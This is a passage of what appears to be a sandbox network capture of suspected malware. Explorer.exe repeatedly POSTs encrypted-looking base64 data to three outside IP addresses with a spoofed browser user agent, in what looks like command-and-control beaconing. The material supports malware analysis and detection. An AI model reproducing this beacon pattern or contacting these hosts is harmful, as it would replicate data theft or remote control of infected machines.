F+trkpMvH2uo20Sy4cQHcPyTH+ZCTOXQAJMwkxDFA3oY7JnT/5JxCbZ/l5/ggxrslRAee2SMTzZnx/uMtW377jouexzPJ0tlXgNOGBFgvzjwV8jYIZicMV1xNEGOeE+13qgZFNX2o8vW7dyxsiCZg9UTBuWq27xuh+irbr93VbsI1Wde5Cf+idlV3ysauhTCOnp4Pxm/eISzmZmyya8xsYq1c91P9/TT45C3pAPdtII8DnR1g6HUfZYESIG4Q+d
2024-07-27 05:46:10 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:10 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:10 UTC	685	IN	Data Raw: 65 4e 30 4e 4b 75 74 6e 6f 36 35 72 59 4c 51 63 72 4b 4d 30 41 58 6e 68 36 69 6b 4e 73 69 34 51 65 4f 46 63 50 4e 52 72 48 38 73 67 56 6a 37 4a 62 46 39 6d 6f 30 45 4e 73 56 30 49 6e 2b 75 37 53 6b 44 66 77 48 72 65 78 47 38 2f 63 51 31 31 74 52 49 75 4b 37 46 6f 71 67 52 36 37 2f 4c 48 69 66 47 68 75 39 2b 75 54 55 63 32 2f 59 5a 37 35 43 6c 32 79 71 35 53 46 43 6e 67 79 49 37 48 47 43 5a 48 76 33 54 59 7a 71 6e 33 7a 61 69 5a 66 41 61 46 71 6d 31 48 62 55 53 58 74 73 52 31 54 79 43 41 2f 71 4e 55 5a 61 45 6c 30 71 4a 70 45 73 6e 6c 50 30 30 7a 30 74 67 32 33 74 57 62 78 56 65 6d 42 2f 79 7a 70 45 6c 69 50 4a 59 75 50 37 64 55 4c 51 34 31 38 76 41 2f 63 77 54 59 6f 78 57 65 45 4b 35 4c 77 6a 50 6f 63 39 79 50 39 61 32 35 73 35 68 75 70 78 4a 77 49 74 39 Data Ascii: eN0NKutno65rYLQcrKM0AXnh6ikNsi4QeOFcPNRrH8sgVj7JbF9mo0ENsV0In+u7SkDfwHrexG8/cQ11tRIuK7FoqgR67/LHifGhu9+uTUc2/YZ75Cl2yq5SFCngyI7HGCZHv3TYzqn3zaiZfAaFqm1HbUSXtsR1TyCA/qNUZaEl0qJpEsnlP00z0tg23tWbxVemB/yzpEliPJYuP7dULQ418vA/cwTYoxWeEK5LwjPoc9yP9a25s5hupxJwIt9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	62370	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:11 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:11 UTC	1122	OUT	Data Raw: 5a 2f 78 4d 4c 59 76 51 52 39 7a 65 33 34 6d 30 57 72 4e 62 41 76 6b 61 69 77 41 31 49 6b 38 72 50 44 61 79 56 70 2f 78 5a 5a 79 53 59 2b 78 52 68 46 7a 70 47 58 68 66 49 59 56 50 30 44 48 42 4d 34 61 4d 73 43 43 42 65 64 4d 56 78 4a 69 7a 71 62 68 5a 4f 33 6d 4d 31 72 6c 77 43 78 77 65 51 4a 73 4f 61 4a 6c 4e 75 30 6e 62 59 35 2f 37 66 36 72 66 58 30 48 6b 6e 6f 35 51 4b 51 62 61 43 42 4b 49 77 2f 43 75 47 70 72 4a 44 7a 52 45 55 74 75 30 4f 4f 59 37 32 4b 35 4c 73 43 48 31 61 79 73 70 49 42 67 61 72 6c 61 52 46 6d 58 77 61 77 31 79 30 6d 59 5a 33 70 47 50 49 6b 2f 4e 75 36 32 63 44 58 6d 45 33 4e 6a 67 6b 6b 68 53 4c 72 33 30 31 4f 45 59 48 63 70 2b 68 2f 6e 47 7a 59 56 54 51 6f 62 41 2f 56 56 42 32 46 49 34 34 53 64 64 4a 77 4b 79 55 64 6b 51 36 49 47 Data Ascii: Z/xMLYvQR9ze34m0WrNbAvkaiwA1Ik8rPDayVp/xZZySY+xRhFzpGXhfIYVP0DHBM4aMsCCBedMVxJizqbhZO3mM1rlwCxweQJsOaJlNu0nbY5/7f6rfX0Hkno5QKQbaCBKIw/CuGprJDzREUtu0OOY72K5LsCH1ayspIBgarlaRFmXwaw1y0mYZ3pGPIk/Nu62cDXmE3NjgkkhSLr301OEYHcp+h/nGzYVTQobA/VVB2FI44SddJwKyUdkQ6IG
2024-07-27 05:46:12 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:12 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:12 UTC	685	IN	Data Raw: 58 51 61 55 44 4a 6f 74 46 4f 36 52 6d 56 62 71 4e 57 43 77 4b 5a 70 47 77 65 4f 54 71 4c 6b 37 44 71 42 57 34 64 57 6e 38 47 5a 33 71 73 70 74 4e 72 69 41 73 49 45 48 68 2b 4a 47 42 45 64 6e 77 6d 6d 51 50 58 43 6e 4f 37 6e 6f 53 6f 6c 4a 52 62 39 38 59 77 6e 37 49 63 4c 6e 4e 48 65 62 57 30 68 5a 57 4f 36 79 48 78 6d 6a 48 67 34 44 41 78 44 69 72 64 46 33 38 38 6c 4c 2b 62 61 36 76 53 7a 55 41 62 32 59 44 54 6c 43 6e 4b 33 7a 77 50 4f 59 2f 48 51 55 30 79 65 44 53 58 6c 71 4d 37 34 6a 37 6a 4f 39 63 50 76 6d 46 63 6b 32 44 43 75 71 2b 4e 72 2f 31 6b 69 69 4d 49 39 7a 72 66 4e 6f 74 67 74 48 53 6f 50 2f 64 55 63 4a 56 65 4e 42 6a 57 57 77 76 69 66 56 77 47 72 72 73 74 7a 44 49 32 37 43 68 4e 31 75 34 4e 56 6d 53 49 6e 61 57 4b 45 32 32 37 6c 35 53 53 65 Data Ascii: XQaUDJotFO6RmVbqNWCwKZpGweOTqLk7DqBW4dWn8GZ3qsptNriAsIEHh+JGBEdnwmmQPXCnO7noSolJRb98Ywn7IcLnNHebW0hZWO6yHxmjHg4DAxDirdF388lL+ba6vSzUAb2YDTlCnK3zwPOY/HQU0yeDSXlqM74j7jO9cPvmFck2DCuq+Nr/1kiiMI9zrfNotgtHSoP/dUcJVeNBjWWwvifVwGrrstzDI27ChN1u4NVmSInaWKE227l5SSe

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	62371	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:13 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:46:13 UTC	1267	OUT	Data Raw: 44 54 66 42 73 73 69 50 49 41 56 64 59 6e 6c 62 33 6e 56 58 35 39 7a 6a 34 47 5a 73 5a 34 4e 6d 6e 5a 32 47 58 69 77 39 49 35 35 2f 58 75 75 38 74 44 31 4d 65 73 2f 53 44 31 54 32 79 4d 4f 72 42 75 62 37 41 78 62 55 68 71 63 49 35 48 4c 6b 6a 4a 6d 4f 37 6b 48 50 6c 2f 4f 45 4b 45 5a 62 6e 41 76 68 68 48 44 42 59 6c 6b 4e 67 35 52 49 55 4f 51 45 30 56 68 6b 50 2f 68 4f 6d 48 4e 6f 32 49 4b 33 42 30 78 6d 39 63 64 39 74 4e 6a 75 57 50 61 6b 35 6d 35 44 35 43 6f 38 46 5a 37 66 6e 4c 71 48 52 72 51 42 4f 32 63 38 56 4f 75 59 6a 56 53 4b 73 6e 31 50 41 37 4b 52 6a 45 63 45 50 62 77 4e 4d 75 61 72 49 74 6f 47 38 4f 2b 32 58 47 6e 65 37 33 2f 53 70 77 65 43 32 2f 64 70 4a 6e 37 64 62 7a 6e 79 70 61 41 74 2b 5a 37 41 73 4e 62 50 30 42 45 2b 4a 43 4a 73 49 64 31 Data Ascii: DTfBssiPIAVdYnlb3nVX59zj4GZsZ4NmnZ2GXiw9I55/Xuu8tD1Mes/SD1T2yMOrBub7AxbUhqcI5HLkjJmO7kHPl/OEKEZbnAvhhHDBYlkNg5RIUOQE0VhkP/hOmHNo2IK3B0xm9cd9tNjuWPak5m5D5Co8FZ7fnLqHRrQBO2c8VOuYjVSKsn1PA7KRjEcEPbwNMuarItoG8O+2XGne73/SpweC2/dpJn7dbznypaAt+Z7AsNbP0BE+JCJsId1
2024-07-27 05:46:14 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:14 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:14 UTC	685	IN	Data Raw: 63 56 51 6e 43 58 4d 7a 69 6e 34 5a 42 33 56 46 6a 65 2f 62 58 36 6c 6f 51 42 6f 49 34 41 62 61 76 51 79 75 73 50 6e 34 6d 48 46 70 64 30 76 4d 4f 77 58 37 36 37 4b 58 63 48 5a 74 2f 34 4a 35 57 75 39 51 43 55 66 68 7a 76 46 66 70 2b 70 34 68 37 4a 42 78 37 41 67 47 39 58 41 4c 78 43 57 76 59 64 43 7a 31 38 4c 54 2b 48 61 79 34 79 42 46 63 46 56 7a 64 51 63 67 4d 35 48 76 6a 6b 2f 4b 57 39 41 70 55 48 68 7a 65 72 4f 31 47 4d 35 79 67 6b 34 45 45 70 71 77 36 63 35 4f 31 56 56 6e 37 50 6e 6d 7a 39 55 79 62 4f 70 54 39 6c 4c 46 64 41 49 44 51 42 41 70 2b 63 2b 4d 66 6e 34 39 2f 4e 68 62 42 32 46 31 46 74 41 53 4b 57 37 66 72 52 45 75 65 55 58 38 74 34 6b 38 73 47 6d 77 33 51 79 51 6b 62 66 30 64 42 7a 45 66 61 38 48 6b 4e 6a 76 66 70 34 64 67 79 34 76 47 75 Data Ascii: cVQnCXMzin4ZB3VFje/bX6loQBoI4AbavQyusPn4mHFpd0vMOwX767KXcHZt/4J5Wu9QCUfhzvFfp+p4h7JBx7AgG9XALxCWvYdCz18LT+Hay4yBFcFVzdQcgM5Hvjk/KW9ApUHhzerO1GM5ygk4EEpqw6c5O1VVn7Pnmz9UybOpT9lLFdAIDQBAp+c+Mfn49/NhbB2F1FtASKW7frREueUX8t4k8sGmw3QyQkbf0dBzEfa8HkNjvfp4dgy4vGu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	62374	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:15 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:15 UTC	1122	OUT	Data Raw: 6a 77 41 46 77 4e 4f 67 33 4b 42 57 63 74 34 2f 51 31 6b 72 7a 66 4c 43 51 76 56 4f 70 4e 50 44 53 6e 34 6a 34 37 70 79 41 53 4c 30 2b 35 41 73 6e 31 57 4c 36 6d 34 4f 32 35 71 71 73 48 4e 48 48 32 76 6d 74 4f 6a 71 32 52 68 68 2f 33 6b 72 31 5a 2b 74 59 66 47 2b 52 71 64 51 69 56 4c 79 46 67 66 36 4c 64 55 72 68 74 31 45 54 33 79 54 39 32 52 42 73 67 2b 50 2b 70 30 2f 4a 69 66 6b 6f 52 4c 57 6d 50 7a 37 41 46 63 2b 42 74 33 63 44 61 6f 56 61 37 45 75 70 61 6d 6e 64 69 38 7a 6c 42 38 57 47 6e 69 42 43 4f 47 34 31 32 57 74 46 5a 36 39 7a 70 6c 66 2b 73 45 31 38 4f 7a 70 68 4d 41 54 52 45 57 4f 69 4d 6a 62 34 69 47 53 67 43 58 6d 76 50 4d 6c 53 45 51 6e 44 70 6b 72 42 78 6b 70 66 6d 76 78 36 71 38 58 35 51 69 67 7a 43 45 50 36 41 77 50 6a 30 59 52 69 53 79 Data Ascii: jwAFwNOg3KBWct4/Q1krzfLCQvVOpNPDSn4j47pyASL0+5Asn1WL6m4O25qqsHNHH2vmtOjq2Rhh/3kr1Z+tYfG+RqdQiVLyFgf6LdUrht1ET3yT92RBsg+P+p0/JifkoRLWmPz7AFc+Bt3cDaoVa7Eupamndi8zlB8WGniBCOG412WtFZ69zplf+sE18OzphMATREWOiMjb4iGSgCXmvPMlSEQnDpkrBxkpfmvx6q8X5QigzCEP6AwPj0YRiSy
2024-07-27 05:46:16 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:16 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:16 UTC	685	IN	Data Raw: 4d 6c 79 7a 77 56 47 6c 4e 70 41 59 36 67 31 49 6a 6c 51 50 74 46 69 32 4c 45 41 6b 37 7a 5a 46 45 58 58 49 59 30 35 69 50 54 54 4d 71 30 69 54 2f 58 62 30 72 77 50 76 4f 50 31 4d 4d 76 6d 4f 52 30 52 33 37 38 4f 61 37 68 46 72 4e 52 72 69 44 6e 49 42 7a 5a 36 49 65 41 66 48 71 55 36 55 38 41 32 78 50 4a 63 50 77 45 33 44 67 30 57 57 50 69 30 2f 48 6a 36 35 58 6d 37 56 32 55 2b 75 77 48 47 70 2b 4b 4a 72 49 68 73 30 74 4f 46 4b 47 4e 2f 34 54 44 2f 47 44 77 71 5a 79 33 6c 6f 57 62 56 7a 6d 65 6c 7a 35 70 63 47 51 57 6c 6f 66 31 4d 38 35 48 4e 6e 38 54 66 72 4a 66 54 63 4c 42 41 79 6f 76 76 53 34 34 6f 73 57 36 6d 67 71 69 4f 54 70 35 4b 47 61 4f 52 47 76 5a 59 6f 4d 30 61 62 62 4d 67 2b 6f 50 64 6e 43 6f 7a 75 65 30 76 67 35 67 67 6c 56 6e 6f 4f 69 59 31 Data Ascii: MlyzwVGlNpAY6g1IjlQPtFi2LEAk7zZFEXXIY05iPTTMq0iT/Xb0rwPvOP1MMvmOR0R378Oa7hFrNRriDnIBzZ6IeAfHqU6U8A2xPJcPwE3Dg0WWPi0/Hj65Xm7V2U+uwHGp+KJrIhs0tOFKGN/4TD/GDwqZy3loWbVzmelz5pcGQWlof1M85HNn8TfrJfTcLBAyovvS44osW6mgqiOTp5KGaORGvZYoM0abbMg+oPdnCozue0vg5gglVnoOiY1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	62375	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:17 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:17 UTC	1122	OUT	Data Raw: 5a 52 56 36 6e 32 35 77 43 45 52 30 65 36 6f 41 52 77 2f 56 52 79 47 78 53 5a 69 79 43 73 44 53 56 6d 75 7a 6b 61 54 67 61 37 75 6d 31 4b 63 33 70 66 68 55 35 50 4a 34 5a 6c 48 55 35 56 48 44 6d 39 57 53 41 73 64 2f 4c 33 33 6b 2b 48 58 57 6a 46 79 30 4a 54 38 71 74 30 72 6b 61 59 2f 61 76 66 6a 50 45 50 54 66 4a 79 56 68 70 59 6a 72 32 49 39 6e 64 39 56 30 54 4e 36 75 56 7a 68 77 39 49 77 34 74 53 58 67 57 32 38 32 5a 33 4e 31 6b 48 41 56 79 50 79 32 6b 59 55 32 56 69 51 2b 46 6a 55 35 49 4b 4e 41 66 59 44 6b 33 54 56 54 54 78 38 7a 47 38 71 37 4d 73 71 4e 38 7a 6e 52 53 64 2f 58 48 6b 76 53 38 50 46 6f 7a 72 36 47 76 51 30 62 2f 64 55 42 61 50 58 72 49 59 32 63 39 6d 78 76 37 30 50 65 41 49 6b 4a 45 57 79 76 54 76 4d 59 57 2f 44 54 49 52 46 63 6b 72 6b Data Ascii: ZRV6n25wCER0e6oARw/VRyGxSZiyCsDSVmuzkaTga7um1Kc3pfhU5PJ4ZlHU5VHDm9WSAsd/L33k+HXWjFy0JT8qt0rkaY/avfjPEPTfJyVhpYjr2I9nd9V0TN6uVzhw9Iw4tSXgW282Z3N1kHAVyPy2kYU2ViQ+FjU5IKNAfYDk3TVTTx8zG8q7MsqN8znRSd/XHkvS8PFozr6GvQ0b/dUBaPXrIY2c9mxv70PeAIkJEWyvTvMYW/DTIRFckrk
2024-07-27 05:46:18 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:18 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:18 UTC	685	IN	Data Raw: 70 6b 52 36 70 39 36 2b 58 61 64 2f 75 58 71 71 56 6c 55 54 72 35 49 58 71 57 6c 53 77 58 59 54 39 73 6e 7a 38 63 5a 71 73 38 71 39 54 51 76 4f 44 69 46 39 48 45 53 53 75 33 68 64 47 34 75 34 51 56 70 36 4e 45 4a 70 4b 67 73 71 53 72 48 75 66 6b 5a 74 72 38 46 55 77 37 33 4b 6b 57 55 7a 72 2b 33 53 72 6b 4f 79 2b 37 72 65 32 70 5a 70 72 4a 63 78 6c 49 36 58 34 30 56 75 2b 65 42 35 47 39 6e 54 58 4c 45 48 57 42 6f 56 2b 4a 56 2b 77 31 72 55 45 77 32 73 63 35 33 2f 35 38 55 67 52 77 5a 31 34 77 66 47 37 66 56 5a 6a 78 33 76 65 58 2b 62 77 62 4c 30 32 49 50 68 64 51 57 62 55 33 68 77 46 6b 59 37 31 51 39 4b 4d 39 79 78 6e 36 6a 44 72 53 4f 73 4b 64 75 45 50 4d 51 6d 2b 4c 41 65 51 75 66 34 39 4f 50 6a 50 41 68 6c 7a 30 67 39 62 69 6a 51 52 54 4e 48 36 55 4a Data Ascii: pkR6p96+Xad/uXqqVlUTr5IXqWlSwXYT9snz8cZqs8q9TQvODiF9HESSu3hdG4u4QVp6NEJpKgsqSrHufkZtr8FUw73KkWUzr+3SrkOy+7re2pZprJcxlI6X40Vu+eB5G9nTXLEHWBoV+JV+w1rUEw2sc53/58UgRwZ14wfG7fVZjx3veX+bwbL02IPhdQWbU3hwFkY71Q9KM9yxn6jDrSOsKduEPMQm+LAeQuf49OPjPAhlz0g9bijQRTNH6UJ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	62376	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:19 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:19 UTC	1122	OUT	Data Raw: 55 33 33 4c 74 4b 68 59 66 77 4c 31 71 72 61 4c 43 46 2f 53 70 30 4a 6a 57 6f 79 43 5a 47 34 78 6a 63 64 61 6f 67 6f 42 7a 37 75 61 59 52 37 52 6b 5a 41 58 75 69 71 64 5a 33 78 38 73 5a 4f 70 46 78 53 31 43 74 74 70 58 62 64 6f 77 79 6b 34 2b 62 4d 6b 2b 7a 74 6a 61 58 51 4c 73 59 5a 2f 38 64 42 6f 70 32 6f 42 37 62 32 39 36 52 4c 38 72 41 7a 36 67 31 35 2f 46 70 36 69 44 75 4c 35 75 41 42 68 42 6c 44 78 71 35 31 51 32 75 30 33 64 34 6b 52 69 4b 34 37 41 6c 50 63 32 49 6a 43 64 74 59 6a 6d 69 78 6d 33 6a 53 6d 49 59 47 37 49 4e 51 51 4a 65 71 51 67 36 61 4a 6f 75 4a 70 43 6a 46 66 48 74 61 47 50 66 67 49 73 62 6c 4f 4d 2b 30 38 6e 4f 38 66 51 35 76 76 68 2f 31 78 59 58 6c 63 5a 72 49 74 2f 6a 74 6d 75 4a 52 71 49 36 48 6f 4f 62 44 44 7a 32 69 48 34 53 4e Data Ascii: U33LtKhYfwL1qraLCF/Sp0JjWoyCZG4xjcdaogoBz7uaYR7RkZAXuiqdZ3x8sZOpFxS1CttpXbdowyk4+bMk+ztjaXQLsYZ/8dBop2oB7b296RL8rAz6g15/Fp6iDuL5uABhBlDxq51Q2u03d4kRiK47AlPc2IjCdtYjmixm3jSmIYG7INQQJeqQg6aJouJpCjFfHtaGPfgIsblOM+08nO8fQ5vvh/1xYXlcZrIt/jtmuJRqI6HoObDDz2iH4SN
2024-07-27 05:46:20 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:20 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:20 UTC	685	IN	Data Raw: 55 5a 71 4d 57 76 5a 41 31 6e 30 79 51 71 34 6d 46 44 73 2b 69 2b 56 37 50 73 34 75 63 2f 42 59 30 75 6d 68 49 6f 66 6a 55 62 79 30 30 38 35 71 46 4e 47 4c 4f 62 51 61 4c 4f 41 32 44 6d 53 42 55 44 65 6f 46 32 31 42 6e 7a 56 71 48 37 4a 6a 4c 51 4d 6f 57 73 4a 72 75 75 4f 58 5a 4a 39 72 66 6e 4a 6b 58 4c 74 7a 4e 4f 57 71 5a 6f 7a 64 31 6b 2f 63 2b 6e 76 39 57 48 35 74 62 79 38 62 71 35 77 77 47 63 42 57 72 68 49 44 6a 2f 74 6d 47 47 75 62 58 45 79 4a 52 69 59 38 65 38 6f 4e 57 6f 42 4e 51 41 65 51 36 39 6f 47 48 61 2b 78 50 43 45 6f 41 45 64 74 36 53 38 6c 62 77 79 77 74 34 6d 6b 4b 4f 48 31 79 46 75 78 4f 77 36 6d 37 6d 77 50 70 66 44 4c 76 6c 46 33 75 52 54 49 66 49 75 64 56 30 6a 6a 6e 33 52 72 67 4e 34 78 52 56 61 56 49 62 33 64 62 45 35 42 7a 55 70 Data Ascii: UZqMWvZA1n0yQq4mFDs+i+V7Ps4uc/BY0umhIofjUby0085qFNGLObQaLOA2DmSBUDeoF21BnzVqH7JjLQMoWsJruuOXZJ9rfnJkXLtzNOWqZozd1k/c+nv9WH5tby8bq5wwGcBWrhIDj/tmGGubXEyJRiY8e8oNWoBNQAeQ69oGHa+xPCEoAEdt6S8lbwywt4mkKOH1yFuxOw6m7mwPpfDLvlF3uRTIfIudV0jjn3RrgN4xRVaVIb3dbE5BzUp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	62377	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:21 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:21 UTC	1122	OUT	Data Raw: 4d 61 7a 64 4f 31 6e 56 4b 66 48 4c 6d 4e 2b 53 70 4d 46 4d 4e 43 4c 48 69 56 41 78 54 58 44 30 78 2b 67 47 6e 49 4c 34 64 68 6e 39 42 64 42 43 44 55 33 56 51 48 75 49 64 6c 7a 66 51 32 54 4d 4f 57 33 41 37 61 57 59 77 44 32 70 74 66 75 6d 38 6d 39 70 32 58 76 5a 36 68 4c 33 65 37 6e 59 74 6e 53 79 79 77 73 4d 4c 44 46 2f 78 4d 71 67 53 35 39 59 64 76 4c 31 56 48 33 61 37 57 36 68 52 76 4e 4c 70 64 32 6d 30 4f 47 79 6a 35 35 75 72 41 62 59 6f 46 71 78 51 65 6d 37 58 53 77 41 69 75 46 57 56 42 38 2b 48 6f 53 4d 34 36 56 57 6a 43 4c 37 79 4e 75 66 6e 48 6e 61 50 77 44 62 45 6b 70 30 75 57 57 6c 74 65 31 49 4a 74 36 4f 37 78 30 72 75 4c 51 66 4b 58 61 66 47 66 61 41 44 6f 70 6b 70 71 74 61 43 45 77 45 47 30 47 6c 35 76 49 4b 75 64 52 70 49 47 64 2f 52 79 75 Data Ascii: MazdO1nVKfHLmN+SpMFMNCLHiVAxTXD0x+gGnIL4dhn9BdBCDU3VQHuIdlzfQ2TMOW3A7aWYwD2ptfum8m9p2XvZ6hL3e7nYtnSyywsMLDF/xMqgS59YdvL1VH3a7W6hRvNLpd2m0OGyj55urAbYoFqxQem7XSwAiuFWVB8+HoSM46VWjCL7yNufnHnaPwDbEkp0uWWlte1IJt6O7x0ruLQfKXafGfaADopkpqtaCEwEG0Gl5vIKudRpIGd/Ryu
2024-07-27 05:46:22 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:22 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:46:22 UTC	685	IN	Data Raw: 47 66 58 47 7a 77 46 4b 65 44 41 55 43 6b 6b 47 47 35 69 43 4f 79 78 49 43 51 63 75 4c 2b 4a 6f 33 69 37 61 36 77 74 55 77 59 49 4f 44 41 72 7a 35 4a 56 2f 4e 79 61 61 6e 42 77 7a 41 48 59 32 62 65 55 64 75 6b 63 54 2f 32 35 52 50 4d 33 61 59 47 5a 4e 5a 78 64 2b 72 36 64 43 75 34 57 49 33 38 49 78 4d 39 6b 54 57 53 41 61 4d 2f 59 75 46 37 35 79 45 34 4f 51 50 4e 6d 2f 2f 74 34 4a 6a 49 48 47 44 49 63 74 49 76 4b 34 38 51 79 42 70 6f 74 47 51 53 44 6c 36 37 37 6d 5a 33 65 50 5a 31 76 48 36 5a 31 79 51 6a 2f 35 77 6f 62 7a 37 47 2f 79 6b 64 52 6e 4b 44 31 4e 65 77 58 77 78 61 65 52 55 52 36 48 43 59 52 76 4e 31 35 4b 6d 4e 5a 38 30 46 71 43 31 4b 64 43 53 48 2f 37 35 53 53 72 63 69 64 51 4b 6c 76 55 6b 4c 4e 4e 4a 65 53 69 55 52 67 7a 4a 67 2f 74 4e 2b 6e Data Ascii: GfXGzwFKeDAUCkkGG5iCOyxICQcuL+Jo3i7a6wtUwYIODArz5JV/NyaanBwzAHY2beUdukcT/25RPM3aYGZNZxd+r6dCu4WI38IxM9kTWSAaM/YuF75yE4OQPNm//t4JjIHGDIctIvK48QyBpotGQSDl677mZ3ePZ1vH6Z1yQj/5wobz7G/ykdRnKD1NewXwxaeRUR6HCYRvN15KmNZ80FqC1KdCSH/75SSrcidQKlvUkLNNJeSiURgzJg/tN+n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	62378	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:46:23 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:46:23 UTC	1122	OUT	Data Raw: 48 2f 4b 50 45 44 52 4b 4d 44 6f 49 73 31 74 58 54 31 6d 50 53 65 35 53 66 72 4d 6d 34 62 4f 58 56 6e 52 35 48 66 41 46 45 73 62 6a 34 6b 76 4a 43 52 71 63 35 33 70 59 43 51 52 59 34 59 35 46 70 51 6f 4f 2f 6f 5a 46 55 6e 39 44 57 45 4b 30 63 6c 61 62 44 6d 6a 47 63 67 35 79 6d 47 34 66 30 6c 36 6a 57 56 4c 4a 44 4b 30 44 38 62 6a 79 32 42 4e 4e 53 54 58 79 51 36 79 61 48 37 4b 72 6e 43 51 6a 69 61 36 4b 33 35 36 30 30 54 44 43 6f 65 32 51 59 4e 49 72 61 74 65 45 68 30 6e 78 56 32 6b 42 78 66 79 49 4e 42 4d 35 47 41 5a 57 45 77 68 56 4d 54 62 71 48 49 6d 49 6e 33 66 50 51 4b 4c 39 34 61 5a 4a 55 37 41 61 42 75 35 69 59 6e 44 6f 59 61 55 67 6e 65 51 37 64 41 4f 74 4e 77 34 54 6e 41 75 57 53 64 6d 72 36 53 63 31 56 59 59 55 59 63 55 39 62 38 4f 6f 6f 4a 70 Data Ascii: H/KPEDRKMDoIs1tXT1mPSe5SfrMm4bOXVnR5HfAFEsbj4kvJCRqc53pYCQRY4Y5FpQoO/oZFUn9DWEK0clabDmjGcg5ymG4f0l6jWVLJDK0D8bjy2BNNSTXyQ6yaH7KrnCQjia6K35600TDCoe2QYNIrateEh0nxV2kBxfyINBM5GAZWEwhVMTbqHImIn3fPQKL94aZJU7AaBu5iYnDoYaUgneQ7dAOtNw4TnAuWSdmr6Sc1VYYUYcU9b8OooJp
2024-07-27 05:46:24 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:46:24 GMT Content-Type: text/plain; charset=utf-8 Connection: close
